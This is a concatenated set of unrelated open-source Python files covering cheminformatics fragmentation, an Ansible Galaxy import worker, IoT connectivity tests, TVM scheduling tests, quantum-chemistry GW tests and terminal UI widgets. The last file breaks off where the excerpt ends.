frags = FraggleSim.generate_fraggle_fragmentation(mol)
smiles = set([])
for seq in frags:
smiles |= {s.strip() for s in seq.split(".")}
smiles = list(sorted(smiles, reverse=True))
frags = [dm.to_mol(s) for s in smiles]
if fix:
frags = [dm.fix_mol(x) for x in frags]
if sanitize:
frags = [dm.sanitize_mol(x) for x in frags]
frags = [x for x in frags if x is not None]
if remove_parent:
return frags
return [mol] + frags
def recap(
mol: Chem.rdchem.Mol,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Fragment the molecule using the recap algorithm.
Args:
mol: a molecule.
remove_parent: Remove parent from the fragments.
sanitize: Wether to sanitize the fragments.
fix: Wether to fix the fragments.
"""
res = Recap.RecapDecompose(mol)
frags = [dm.to_mol(x) for x in res.GetAllChildren().keys()]
if fix:
frags = [dm.fix_mol(x) for x in frags]
if sanitize:
frags = [dm.sanitize_mol(x) for x in frags]
frags = [x for x in frags if x is not None]
if remove_parent:
return frags
return [mol] + frags
def anybreak(
mol: Chem.rdchem.Mol,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Fragment molecule by applying brics first, then fall back to frag.
Args:
mol: a molecule.
remove_parent: Remove parent from the fragments.
sanitize: Wether to sanitize the fragments.
fix: Wether to fix the fragments.
"""
frags = []
try:
frags = brics(mol, fix=fix, remove_parent=remove_parent, sanitize=sanitize)
except:
pass
if len(frags) == 0:
frags = frag(mol, remove_parent=remove_parent, sanitize=sanitize, fix=fix)
return frags
def mmpa_frag(
mol,
pattern: str = None,
max_cut: int = 1,
max_bond_cut: int = 20,
h_split: bool = False,
) -> Optional[Set[Chem.Mol]]:
"""Fragment molecule on specific bonds suitable for a MMPA analysis.
Args:
mol: Molecule to fragment.
pattern: Bond pattern to split on. Will use default rdkit pattern
'[#6+0;!$(*=,#[!#6])]!@!=!#[*]' if not provided.
max_cut: Number of cuts.
max_bond_cut: Maximum number of bond to cut. Default to 20.
h_split: Whether to split at hydrogen position too.
This is equivalent to enabling the addition of new fragments.
Returns:
List of fragments
"""
frags = []
if pattern is None:
frags = rdMMPA.FragmentMol(
mol,
maxCuts=max_cut,
resultsAsMols=False,
maxCutBonds=max_bond_cut,
)
elif pattern:
frags = rdMMPA.FragmentMol(
mol,
pattern=pattern,
maxCuts=max_cut,
resultsAsMols=False,
maxCutBonds=max_bond_cut,
)
if h_split:
mol = Chem.AddHs(mol)
frags += rdMMPA.FragmentMol(
mol,
pattern="[#1]!@!=!#[!#1]",
maxCuts=1,
resultsAsMols=False,
maxCutBonds=max_bond_cut,
)
return set(frags)
def mmpa_cut(mol: Chem.rdchem.Mol, rdkit_pattern: bool = False) -> Optional[Set[Any]]:
"""Cut molecules to perform mmpa analysis later
Args:
mol: Molecule to fragment.
rdkit_pattern: Whether to perform the fragmentation
using the default rdkit pattern: [#6+0;!$(*=, #[!#6])]!@!=!#[*]"
Returns:
List of 'smiles,core,chains'
"""
if mol is None:
return mol
outlines = set()
smiles = dm.to_smiles(mol)
if rdkit_pattern:
frags = mmpa_frag(mol, max_cut=3, max_bond_cut=30)
else:
# heavy atoms
frags = mmpa_frag(mol, pattern="[!#1]!@!=!#[!#1]", max_cut=4, max_bond_cut=30)
frags.update(mmpa_frag(mol, pattern="[!#1]!@!=!#[!#1]", max_cut=3, max_bond_cut=30))
frags = set(frags)
for core, chains in frags:
output = f"{smiles},{core},{chains}\n"
outlines.add(output)
# hydrogen splitting
mol = Chem.AddHs(mol)
smiles = dm.to_smiles(mol)
n = mol.GetNumHeavyAtoms()
if n < 60:
frags = mmpa_frag(mol, pattern=None, max_cut=1, max_bond_cut=100, h_split=True)
for core, chains in frags:
output = f"{smiles},{core},{chains}\n"
outlines.add(output)
return outlines
|
galaxy/worker/tasks/collection.py | timblaktu/galaxy | 904 | 11090446 | # (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
import logging
from django.db import transaction
from django.db.utils import IntegrityError
from galaxy_importer.collection import import_collection as process_collection
from galaxy_importer.collection import CollectionFilename
from galaxy_importer.exceptions import ImporterError
from pulpcore.app import models as pulp_models
import semantic_version as semver
from galaxy.main import models
from galaxy.main.celerytasks import user_notifications
from galaxy.worker import exceptions as exc
from galaxy.worker import logutils
from galaxy.worker.importers.collection import check_dependencies
log = logging.getLogger(__name__)
ARTIFACT_REL_PATH = '{namespace}-{name}-{version}.tar.gz'
CONTENT_TYPE_MAP = {
'role': 'role',
'module': 'module',
'module_utils': 'module_utils',
'action': 'action_plugin',
'become': 'become_plugin',
'cache': 'cache_plugin',
'callback': 'callback_plugin',
'cliconf': 'cliconf_plugin',
'connection': 'connection_plugin',
'doc_fragments': 'doc_fragments_plugin',
'filter': 'filter_plugin',
'httpapi': 'httpapi_plugin',
'inventory': 'inventory_plugin',
'lookup': 'lookup_plugin',
'netconf': 'netconf_plugin',
'shell': 'shell_plugin',
'strategy': 'strategy_plugin',
'terminal': 'terminal_plugin',
'test': 'test_plugin',
'vars': 'vars_plugin',
}
def import_collection(artifact_id, repository_id):
task = models.CollectionImport.current()
log.info(f'Starting collection import task: {task.id}')
artifact = pulp_models.Artifact.objects.get(pk=artifact_id)
repository = pulp_models.Repository.objects.get(pk=repository_id)
filename = CollectionFilename(
task.namespace.name, task.name, task.version)
task_logger = _get_task_logger(task)
task_logger.info(
f'Starting import: task_id={task.id}, artifact_id={artifact_id}')
try:
importer_data = _process_collection(artifact, filename, task_logger)
task_logger.info('Publishing collection')
version = _publish_collection(
task, artifact, repository, importer_data)
task_logger.info('Collection published')
except Exception as e:
task_logger.error(f'Import Task "{task.id}" failed: {e}')
user_notifications.collection_import.delay(task.id, has_failed=True)
artifact.delete()
raise
_notify_followers(version)
user_notifications.collection_import.delay(task.id, has_failed=False)
errors, warnings = task.get_message_stats()
task_logger.info(
f'Import completed with {warnings} warnings and {errors} errors')
def _get_task_logger(task):
logger = logging.getLogger('galaxy.worker.tasks.import_collection')
return logutils.ImportTaskAdapter(logger, task=task)
def _process_collection(artifact, filename, task_logger):
try:
with artifact.file.open() as artifact_file:
importer_data = process_collection(
artifact_file, filename=filename, logger=task_logger
)
except ImporterError as e:
log.error(f'Collection processing was not successfull: {e}')
raise
task_logger.info('Processing via galaxy-importer complete')
importer_data = _transform_importer_data(importer_data)
task_logger.info('Checking dependencies in importer data')
check_dependencies(importer_data['metadata']['dependencies'])
return importer_data
def _transform_importer_data(data):
"""Update data from galaxy_importer to match values in Community Galaxy."""
for c in data['contents']:
c['content_type'] = CONTENT_TYPE_MAP.get(
c['content_type'], c['content_type'])
c['scores'] = None
c['metadata'] = {}
c['role_meta'] = None
c['description'] = c['description'] or ''
return data
@transaction.atomic
def _publish_collection(task, artifact, repository, importer_data):
collection, _ = models.Collection.objects.get_or_create(
namespace=task.namespace, name=importer_data['metadata']['name'])
try:
version = collection.versions.create(
version=importer_data['metadata']['version'],
metadata=importer_data['metadata'],
quality_score=None,
contents=importer_data['contents'],
readme_mimetype='text/markdown',
readme_text='',
readme_html=importer_data['docs_blob']['collection_readme']['html']
)
except IntegrityError:
raise exc.VersionConflict(
'Collection version "{version}" already exists.'
.format(version=importer_data['metadata']['version']))
_update_latest_version(collection, version)
log.info('Updating collection tags')
_update_collection_tags(collection, version, importer_data['metadata'])
rel_path = ARTIFACT_REL_PATH.format(
namespace=importer_data['metadata']['namespace'],
name=importer_data['metadata']['name'],
version=importer_data['metadata']['version'])
pulp_models.ContentArtifact.objects.create(
artifact=artifact,
content=version,
relative_path=rel_path,
)
with pulp_models.RepositoryVersion.create(repository) as new_version:
new_version.add_content(
pulp_models.Content.objects.filter(pk=version.pk)
)
publication = pulp_models.Publication.objects.create(
repository_version=new_version,
complete=True,
pass_through=True,
)
pulp_models.Distribution.objects.update_or_create(
name='galaxy',
base_path='galaxy',
defaults={'publication': publication},
)
task.imported_version = version
task.save()
return version
def _update_latest_version(collection, new_version):
latest_version = collection.latest_version
if latest_version is None or (semver.Version(latest_version.version)
< semver.Version(new_version.version)):
collection.latest_version = new_version
collection.save()
def _update_collection_tags(collection, version, metadata):
"""Update tags at collection-level, only if highest version."""
if collection.latest_version != version:
return
tags_not_in_db = [
{'name': tag, 'description': tag, 'active': True}
for tag in metadata['tags']
if models.Tag.objects.filter(name=tag).count() == 0]
models.Tag.objects.bulk_create([models.Tag(**t) for t in tags_not_in_db])
tags_qs = models.Tag.objects.filter(name__in=metadata['tags'])
collection.tags.add(*tags_qs)
tags_not_in_metadata = [
tag for tag in collection.tags.all()
if tag.name not in metadata['tags']
]
collection.tags.remove(*tags_not_in_metadata)
def _notify_followers(version):
user_notifications.collection_new_version.delay(version.pk)
is_first_version = (version.collection.versions.count() == 1)
if is_first_version:
user_notifications.coll_author_release.delay(version.pk)
|
tests/io/test_input_bounds.py | fracek/OMLT | 115 | 11090450 | <reponame>fracek/OMLT
import pytest
import tempfile
from omlt.io.input_bounds import write_input_bounds, load_input_bounds
def test_input_bounds_reader_writer_with_list():
input_bounds = [(i*10.0, i*10.0 + 1.0) for i in range(10)]
with tempfile.NamedTemporaryFile(suffix='.json', delete=False) as f:
write_input_bounds(f.name, input_bounds)
bounds_back = load_input_bounds(f.name)
for k, v in enumerate(input_bounds):
assert bounds_back[k] == v
def test_input_bounds_reader_writer_with_dictionary():
input_bounds = dict(
((i, i), (i*10.0, i*10.0 + 1.0))
for i in range(10)
)
with tempfile.NamedTemporaryFile(suffix='.json', delete=False) as f:
write_input_bounds(f.name, input_bounds)
bounds_back = load_input_bounds(f.name)
for k, v in input_bounds.items():
assert bounds_back[k] == v
|
amadeus/shopping/_hotel_offers_by_hotel.py | tsolakoua/amadeus-python | 125 | 11090452 | <reponame>tsolakoua/amadeus-python
from amadeus.client.decorator import Decorator
class HotelOffersByHotel(Decorator, object):
def get(self, **params):
'''
Get all offers for Holiday Inn Paris Notre Dame.
.. code-block:: python
amadeus.shopping.hotel_offers_by_hotel.get(hotelId='XKPARC12')
:param hotelId: Amadeus Property Code (8 chars), for
example ``XKPARC12``.
:rtype: amadeus.Response
:raises amadeus.ResponseError: if the request could not be completed
'''
return self.client.get('/v2/shopping/hotel-offers/by-hotel', **params)
|
cls/networks/__init__.py | megvii-model/MABN | 182 | 11090475 | from . import MABN
from . import resnet |
py_feature/108_order_size.py | weiziyoung/instacart | 290 | 11090481 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 16 21:04:09 2017
@author: konodera
"""
import pandas as pd
import numpy as np
from tqdm import tqdm
import utils
utils.start(__file__)
#==============================================================================
# load
#==============================================================================
col = ['order_id', 'user_id', 'product_id', 'order_number', 'order_number_rev']
log = utils.read_pickles('../input/mk/log', col).sort_values('user_id')
#==============================================================================
# def
#==============================================================================
def make(T):
"""
T = 0
folder = 'trainT-0'
"""
if T==-1:
folder = 'test'
else:
folder = 'trainT-'+str(T)
log_ = log[log.order_number_rev>T]
order_tbl = log_.groupby('order_id').size().to_frame()
order_tbl.columns = ['order_size']
order_tbl.reset_index(inplace=True)
order_tbl = pd.merge(order_tbl, log_[['order_id', 'user_id']].drop_duplicates())
user_osz = order_tbl.groupby(['user_id']).order_size.min().to_frame()
user_osz.columns = ['user_order_size-min']
user_osz['user_order_size-max'] = order_tbl.groupby(['user_id']).order_size.max()
user_osz['user_order_size-median'] = order_tbl.groupby(['user_id']).order_size.median()
user_osz['user_order_size-mean'] = order_tbl.groupby(['user_id']).order_size.mean()
user_osz['user_order_size-std'] = order_tbl.groupby(['user_id']).order_size.std()
user_osz.reset_index(inplace=True)
user_osz.to_pickle('../feature/{}/f108_user.p'.format(folder))
#==============================================================================
# main
#==============================================================================
make(0)
make(1)
make(2)
make(-1)
utils.end(__file__)
|
device_e2e/aio/test_send_message.py | Azure/azure-iot-sdk-python | 366 | 11090484 | <gh_stars>100-1000
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
import asyncio
import pytest
import logging
import json
import uuid
from azure.iot.device.exceptions import OperationCancelled
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
pytestmark = pytest.mark.asyncio
@pytest.mark.describe("Client send_message method")
class TestSendMessage(object):
@pytest.mark.it("Can send a simple message")
@pytest.mark.quicktest_suite
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert event.system_properties["message-id"] == random_message.message_id
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Connects the transport if necessary")
@pytest.mark.quicktest_suite
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.dropped_connection
@pytest.mark.describe("Client send_message method with dropped connections")
class TestSendMessageDroppedConnection(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5}
@pytest.mark.it("Sends if connection drops before sending")
@pytest.mark.uses_iptables
async def test_sends_if_drop_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.it("Sends if connection rejects send")
@pytest.mark.uses_iptables
async def test_sends_if_reject_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.reject_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.describe("Client send_message with reconnect disabled")
class TestSendMessageRetryDisabled(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5, "connection_retry": False}
@pytest.fixture(scope="function", autouse=True)
async def reconnect_after_test(self, dropper, client):
yield
dropper.restore_all()
await client.connect()
assert client.connected
@pytest.mark.it("Can send a simple message")
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport manually disconnected before sending")
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport automatically disconnected before sending")
@pytest.mark.uses_iptables
async def test_connects_after_automatic_disconnect(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
while client.connected:
await asyncio.sleep(1)
assert not client.connected
dropper.restore_all()
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Fails if connection disconnects before sending")
@pytest.mark.uses_iptables
async def test_fails_if_disconnect_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
with pytest.raises(OperationCancelled):
await send_task
@pytest.mark.it("Fails if connection drops before sending")
@pytest.mark.uses_iptables
async def test_fails_if_drop_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
with pytest.raises(OperationCancelled):
await client.send_message(random_message)
assert not client.connected
|
tests/python/unittest/test_meta_schedule_schedule_rule_auto_bind.py | gayatripk1/tvm | 4,640 | 11090516 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-module-docstring,missing-function-docstring,missing-class-docstring
from tvm.meta_schedule.space_generator.post_order_apply import PostOrderApply
from tvm.meta_schedule.testing.schedule_rule import auto_bind
from tvm.meta_schedule.testing.space_generation import check_trace
from tvm.meta_schedule.tune_context import TuneContext
from tvm.script import tir as T
from tvm.target import Target
@T.prim_func
def element_wise(var_A: T.handle, var_B: T.handle) -> None:
A = T.match_buffer(var_A, [512, 512], dtype="float32")
B = T.match_buffer(var_B, [512, 512], dtype="float32")
for i, j in T.grid(512, 512):
with T.block("C"):
vi, vj = T.axis.remap("SS", [i, j])
B[vi, vj] = A[vi, vj] + 1.0
@T.prim_func
def reduction_loop_only(
A: T.Buffer[2, "float32"],
B: T.Buffer[2, "float32"],
C: T.Buffer[(), "float32"],
) -> None:
for i0 in T.serial(2):
with T.block("C"):
k0 = T.axis.reduce(2, i0)
T.reads(A[k0], B[k0])
T.writes(C[()])
with T.init():
C[()] = T.float32(1.0)
C[()] = T.min(C[()], A[k0] / B[k0])
@T.prim_func
def zero_dim_add(
A: T.Buffer[(), "float32"],
B: T.Buffer[(), "float32"],
C: T.Buffer[(), "float32"],
) -> None:
with T.block("C"):
vi = T.axis.spatial(1, 0)
C[()] = A[()] + B[()]
def _create_context(mod, target, rule) -> TuneContext:
ctx = TuneContext(
mod=mod,
target=target,
space_generator=PostOrderApply(),
sch_rules=[rule],
task_name="test",
)
return ctx
def test_cuda_element_wise():
expected = [
[
'b0 = sch.get_block(name="C", func_name="main")',
"l1, l2 = sch.get_loops(block=b0)",
"l3 = sch.fuse(l1, l2, preserve_unit_iters=True)",
"v4 = sch.sample_categorical(candidates=[32, 64, 128, 256, 512, 1024], probs=[0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666])",
"l5, l6 = sch.split(loop=l3, factors=[None, v4], preserve_unit_iters=True)",
'sch.bind(loop=l5, thread_axis="blockIdx.x")',
'sch.bind(loop=l6, thread_axis="threadIdx.x")',
]
]
target = Target("nvidia/geforce-rtx-3080", host="llvm")
ctx = _create_context(
element_wise,
target=target,
rule=auto_bind(target=target),
)
spaces = ctx.space_generator.generate_design_space(mod=ctx.mod)
assert len(spaces) == 1
check_trace(spaces, expected)
def test_cuda_reduction_loop_only():
expected = [
[
'b0 = sch.get_block(name="C", func_name="main")',
"l1, = sch.get_loops(block=b0)",
"l2 = sch.add_unit_loop(block_or_loop=l1)",
"l3 = sch.fuse(l2, preserve_unit_iters=True)",
"l4, l5 = sch.split(loop=l3, factors=[None, 1], preserve_unit_iters=True)",
'sch.bind(loop=l4, thread_axis="blockIdx.x")',
'sch.bind(loop=l5, thread_axis="threadIdx.x")',
]
]
target = Target("nvidia/geforce-rtx-3080", host="llvm")
ctx = _create_context(
reduction_loop_only,
target=target,
rule=auto_bind(target=target),
)
spaces = ctx.space_generator.generate_design_space(mod=ctx.mod)
assert len(spaces) == 1
check_trace(spaces, expected)
def test_cuda_zero_dim_add():
expected = [
[
'b0 = sch.get_block(name="C", func_name="main")',
"l1 = sch.add_unit_loop(block_or_loop=b0)",
"l2 = sch.fuse(l1, preserve_unit_iters=True)",
"l3, l4 = sch.split(loop=l2, factors=[None, 1], preserve_unit_iters=True)",
'sch.bind(loop=l3, thread_axis="blockIdx.x")',
'sch.bind(loop=l4, thread_axis="threadIdx.x")',
]
]
target = Target("nvidia/geforce-rtx-3080", host="llvm")
ctx = _create_context(
zero_dim_add,
target=target,
rule=auto_bind(target=target),
)
spaces = ctx.space_generator.generate_design_space(mod=ctx.mod)
assert len(spaces) == 1
check_trace(spaces, expected)
if __name__ == "__main__":
test_cuda_element_wise()
test_cuda_reduction_loop_only()
test_cuda_zero_dim_add()
|
tests/test_kube_api.py | funkypenguin/connaisseur | 281 | 11090541 | <gh_stars>100-1000
import pytest
from . import conftest as fix
import connaisseur.kube_api as k_api
@pytest.mark.parametrize(
"url, response",
[
(
"https://samplenotray.io/apis/v1/namespaces/default/pods/sample-pod",
fix.get_k8s_res("pods"),
),
(
"https://samplenotray.io/apis/v1/namespaces/default/deployments/sample-dpl",
fix.get_k8s_res("deployments"),
),
],
)
def test_request_kube_api(monkeypatch, m_request, url: str, response: dict):
monkeypatch.setenv("KUBERNETES_SERVICE_HOST", "127.0.0.1")
monkeypatch.setenv("KUBERNETES_SERVICE_PORT", "1234")
assert k_api.request_kube_api(url) == response
|
setup.py | twocucao/danmu.fm | 376 | 11090561 | <reponame>twocucao/danmu.fm
# -*- encoding: UTF-8 -*-
from setuptools import setup, find_packages
"""
打包的用的setup必须引入,
"""
VERSION = '0.3.6'
setup(name='danmu.fm',
version=VERSION,
package_data={'danmufm': ['template/*', ]},
description="a tiny and smart cli player of douyu based on Python",
long_description='just enjoy',
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='python douyu danmu danmu.fm terminal',
author='twocucao',
author_email='<EMAIL>',
url='https://github.com/twocucao/doumu.fm',
license='MIT',
packages=find_packages(),
include_package_data=True,
zip_safe=True,
install_requires=[
'requests',
'click',
],
entry_points={
'console_scripts': [
'danmu.fm = danmufm.danmu:main'
]
},
)
# install_requires=[
# 'requests',
# 'pycookiecheat'
# ] + (['pyobjc-core', 'pyobjc'] if 'darwin' in sys.platform else []),
|
pyscf/pbc/gw/test/test_kugw.py | QuESt-Calculator/pyscf | 501 | 11090574 | #!/usr/bin/env python
import unittest
import numpy
import os
from pyscf import lib
from pyscf.pbc import gto, dft, scf, df
from pyscf.pbc.gw import kugw_ac
cell = gto.Cell()
cell.build(
unit = 'B',
a = [[ 0., 6.74027466, 6.74027466],
[ 6.74027466, 0., 6.74027466],
[ 6.74027466, 6.74027466, 0. ]],
atom = '''H 0 0 0
H 1.68506866 1.68506866 1.68506866
H 3.37013733 3.37013733 3.37013733''',
basis = 'gth-dzvp',
pseudo = 'gth-pade',
verbose = 7,
output = '/dev/null',
charge = 0,
spin = None)
cell.spin = 3
kpts = cell.make_kpts([3,1,1], scaled_center=[0,0,0])
kmf = scf.KUHF(cell, kpts, exxdiv=None).density_fit()
kmf.run()
def tearDownModule():
global cell, kmf
cell.stdout.close()
del cell, kmf
class KnownValues(unittest.TestCase):
def test_gwac_pade(self):
gw = kugw_ac.KUGWAC(kmf)
gw.linearized = False
gw.ac = 'pade'
gw.fc = False
nocca, noccb = gw.nocc
gw.kernel(kptlist=[0,1,2], orbs=range(0, nocca+3))
self.assertAlmostEqual(gw.mo_energy[0][0][nocca-1], -0.28012813, 5)
self.assertAlmostEqual(gw.mo_energy[0][0][nocca], 0.13748876, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca-1], -0.29515851, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca], 0.14128011, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb-1], -0.33991721, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb], 0.10578847, 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb-1], -0.33547973, 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb], 0.08053408, 5)
gw.fc = True
nocca, noccb = gw.nocc
gw.kernel(kptlist=[0,1,2], orbs=range(0,nocca+3))
self.assertAlmostEqual(gw.mo_energy[0][0][nocca-1], -0.40244058, 5)
self.assertAlmostEqual(gw.mo_energy[0][0][nocca], 0.13618348, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca-1], -0.41743063, 5)
self.assertAlmostEqual(gw.mo_energy[0][1][nocca], 0.13997427, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb-1], -0.46133481, 5)
self.assertAlmostEqual(gw.mo_energy[1][0][noccb], 0.1044926 , 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb-1], -0.4568894 , 5)
self.assertAlmostEqual(gw.mo_energy[1][1][noccb], 0.07922511, 5)
if __name__ == '__main__':
print('Full Tests for KUGW')
unittest.main()
|
social_auth/backends/contrib/angel.py | merutak/django-social-auth | 863 | 11090576 | <reponame>merutak/django-social-auth
from social.backends.angel import AngelOAuth2 as AngelBackend
|
euporie/box.py | joouha/euporie | 505 | 11090578 | # -*- coding: utf-8 -*-
"""Define box border constants."""
from typing import Optional
from prompt_toolkit.layout.containers import Container
from prompt_toolkit.layout.dimension import Dimension
from prompt_toolkit.layout.mouse_handlers import MouseHandlers
from prompt_toolkit.layout.screen import Char, Screen, WritePosition
from prompt_toolkit.widgets.base import Border as PtkBorder
from euporie.config import config
__all__ = ["SquareBorder", "RoundBorder", "BorderLine", "Pattern"]
class SquareBorder(PtkBorder):
"""Box drawing characters, including characters for splits."""
SPLIT_BOTTOM = "┴"
SPLIT_TOP = "┬"
SPLIT_LEFT = "├"
SPLIT_RIGHT = "┤"
CROSS = "┼"
class RoundBorder(SquareBorder):
"""Box drawing characters with rounded corners."""
TOP_LEFT = "╭"
TOP_RIGHT = "╮"
BOTTOM_LEFT = "╰"
BOTTOM_RIGHT = "╯"
class BorderLine(Container):
"""Draws a horizontal or vertical line."""
def __init__(
self,
char: "Optional[str]" = None,
width: "Optional[int]" = None,
height: "Optional[int]" = None,
collapse: "bool" = False,
style: "str" = "class:border-line",
) -> "None":
"""Initalizes a border line.
Args:
char: The character to draw. If unset, the relavent character from
:py:class:`euporie.box.Border` is used
width: The length of the line. If specified, the line will be horizontal
height: The height of the line. If specified, the line will be vertical
collapse: Whether to hide the line when there is not enough space
style: Style to apply to the line
Raises:
ValueError: If both width and height are specified. A line must only have a
single dimension.
"""
if width and height:
raise ValueError("Only one of `width` or `height` must be set")
self.width = width
self.height = height
if char is None:
char = SquareBorder.VERTICAL if width else SquareBorder.HORIZONTAL
self.char = Char(char, style)
self.collapse = collapse
def reset(self) -> "None":
"""Resets the state of the line. Does nothing."""
def preferred_width(self, max_available_width: "int") -> "Dimension":
"""Return the preferred width of the line."""
return Dimension(min=int(not self.collapse), max=self.width)
def preferred_height(
self, width: "int", max_available_height: "int"
) -> "Dimension":
"""Return the preferred height of the line."""
return Dimension(min=int(not self.collapse), max=self.height)
def write_to_screen(
self,
screen: "Screen",
mouse_handlers: "MouseHandlers",
write_position: "WritePosition",
parent_style: "str",
erase_bg: "bool",
z_index: "Optional[int]",
) -> "None":
"""Draws a continous line in the ``write_position`` area.
Args:
screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which
the output has to be written.
mouse_handlers: :class:`prompt_toolkit.layout.mouse_handlers.MouseHandlers`.
write_position: A :class:`prompt_toolkit.layout.screen.WritePosition` object
defining where this container should be drawn.
erase_bg: If true, the background will be erased prior to drawing.
parent_style: Style string to pass to the :class:`.Window` object. This will
be applied to all content of the windows. :class:`.VSplit` and
:class:`prompt_toolkit.layout.containers.HSplit` can use it to pass
their style down to the windows that they contain.
z_index: Used for propagating z_index from parent to child.
"""
ypos = write_position.ypos
xpos = write_position.xpos
for y in range(ypos, ypos + write_position.height):
row = screen.data_buffer[y]
for x in range(xpos, xpos + write_position.width):
row[x] = self.char
def get_children(self) -> "list":
"""Return an empty list of the container's children."""
return []
class Pattern(Container):
"""Fill an area with a repeating background pattern."""
def __init__(self) -> "None":
"""Initalize the :class:`Pattern`."""
self.bg = Char(" ", "class:pattern")
self.char = Char(config.background_character, "class:pattern")
def reset(self) -> "None":
"""Resets the pattern. Does nothing."""
pass
def preferred_width(self, max_available_width: "int") -> "Dimension":
"""Return an empty diemension (expand to available width)."""
return Dimension()
def preferred_height(
self, width: "int", max_available_height: "int"
) -> "Dimension":
"""Return an empty diemension (expand to available height)."""
return Dimension()
def write_to_screen(
self,
screen: "Screen",
mouse_handlers: "MouseHandlers",
write_position: "WritePosition",
parent_style: "str",
erase_bg: "bool",
z_index: "Optional[int]",
) -> "None":
"""Fill the whole area of write_position with a pattern.
Args:
screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which
the output has to be written.
mouse_handlers: :class:`prompt_toolkit.layout.mouse_handlers.MouseHandlers`.
write_position: A :class:`prompt_toolkit.layout.screen.WritePosition` object
defining where this container should be drawn.
erase_bg: If true, the background will be erased prior to drawing.
parent_style: Style string to pass to the :class:`.Window` object. This will
be applied to all content of the windows. :class:`.VSplit` and
:class:`prompt_toolkit.layout.containers.HSplit` can use it to pass
their style down to the windows that they contain.
z_index: Used for propagating z_index from parent to child.
"""
ypos = write_position.ypos
xpos = write_position.xpos
for y in range(ypos, ypos + write_position.height):
row = screen.data_buffer[y]
for x in range(xpos, xpos + write_position.width):
if (
(config.background_pattern == 1)
or (config.background_pattern == 2 and (x + y) % 2 == 0)
or (config.background_pattern == 3 and (x + 2 * y) % 4 == 0)
or (config.background_pattern == 4 and (x + y) % 3 == 0)
or (
config.background_pattern == 5
